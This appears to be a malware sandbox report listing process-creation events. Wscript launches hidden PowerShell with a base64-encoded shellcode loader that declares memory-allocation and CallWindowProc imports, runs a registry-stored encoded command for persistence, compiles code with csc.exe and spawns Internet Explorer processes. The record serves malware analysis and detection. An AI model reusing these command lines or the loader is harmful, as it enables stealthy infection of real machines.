Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsACAAcABsAGEAdABvAG4Aa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tm43worv.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD568.tmp" "c:\Users\user\AppData\Local\Temp\CSCF0319BB5C3414E72AB519E7A67BBFBFC.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process created: C:\Program Files\internet explorer\iexplore.exe c:\program files\internet explorer\iexplore.exe
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy0zjl34.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA2.tmp" "c:\Users\user\AppData\Local\Temp\CSCB8D22C72555343A48341CA7311A8A12.TMP"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsACAAcABsAGEAdABvAG4Aa Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tm43worv.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD568.tmp" "c:\Users\user\AppData\Local\Temp\CSCF0319BB5C3414E72AB519E7A67BBFBFC.TMP" Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process created: C:\Program Files\internet explorer\iexplore.exe c:\program files\internet explorer\iexplore.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAe